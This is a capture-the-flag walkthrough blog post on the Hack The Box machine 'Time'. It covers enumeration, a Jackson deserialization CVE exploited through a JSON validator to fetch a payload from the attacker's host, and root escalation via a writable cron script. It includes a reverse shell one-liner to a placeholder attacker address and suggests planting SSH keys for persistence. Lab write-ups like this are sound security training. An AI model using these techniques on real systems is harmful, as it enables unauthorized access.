Hack The Box — Time

Eslam Akl
5 min readApr 3, 2021

--

Hey folks, today we have one of HackTheBox machines “Time” which medium level, let’s take a look at its info

It’s based on Linux OS and depends on CVE’s for foothold exploit, let’s get started…

What we will do ?

As usual, we have some steps which we follow to pwn any machine, our steps are:

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

After finishing our steps we will have these informations, stay calm and follow reading :)

1. Information Gathering

In this step we aim to collect all these informations, which we can collect on a specific target like its open ports, security mode of login systems, directories, OS version, services versions, etc

Nmap

We will start this step by scanning all ports to discover the open ports and know where we will get into this machine

nmap -A -T4 10.10.10.214

It has only 2 open ports ssh/http and for the services which running on them, they’re not vulnerable “I know that”

So let’s check the website

HTTP Enumeration

After accessing the port 80 we have found this

It’s online JSON Beautifier validator

after checking the source code, I have found nothing

The next step is to check the directories, so I used dirsearch to do this task, and it returned these results

python3 dirsearch.py -u 10.10.10.214

I don’t see any interesting directories so to check for that I’ve used gobuster with different wordlist

gobuster dir -u 10.10.10.214 -w /path/to/wordlist -l

the same results, so lets returned to the website and try every function there.

2. Scanning

In this step we aim to scan all collected info from the previous one.

After trying to validate some text by using validate(Beta) I’ve found this error

The error

The validation process depends on fasterxml.jackson. Actually, I don’t know what’s this !! But after searching about it, I know that it’s something related to JAVA and used for text validation, after searching for any exploit for these words, I have found this CVE

3. Gaining Access

It works locally as you will see in the repo but after understanding the methodology of it you can edit the execution method to make it remotely, and to be honest, I asked my friend also about it :)

Here’s the code after and before edit it

The first command it’s the original one which you will find in the repo and the second is the edited command to work as remotely

Note that it will get a file called inject.sqlfrom the attacker machine and then use it to exploit the vulnerability, so I’ve downloaded it and edited the command which will execute on the server to return reverse shell bash -i >& /dev/tcp/attacker-ip/port 0>&1

Next step is to execute this command in the text validator area and use nc to listen over the port which you typed in the payload

Request inject.sql file from the attacker machine

It works and we have a shell now

4. Maintaining Access

For this step I’ve performed multiple tasks to get the root privileges:

  1. Enumerate the directories and files for any leaked data
  2. Use Exploit-Suggester tools to discover the kernel vulnerabilities
  3. Use automation tools to perform multiple tasks like linPEAS or linenum
  4. Use PsPy to listen for the executed processes to watch and note if there’s any process can lead me to the root flag

After enumerating the system directories and files, I don’t find anything so let’s go to the next step…

I’ve transported all required tools into my vulnerable machine

After executing the suggester script, it doesn’t discover anything

Let’s use PsPy

I’ve noticed that there’s a process which executed every few seconds as you can see and after accessing the file /usr/bin/timer_backup.sh

I’ve found that I’ve the permission to edit, so I inserted into it a command which get the root flag to a /home directory

And as you can see, it works ❤

Also, you can insert your ssh keys into the root directory and open a root shell using ssh

Congrats ❤

If you find it helpful, Kindly give me a respect from here eslam3kl — HTB

Stay in touch

LinkedIn | GitHub | Twitter

--

--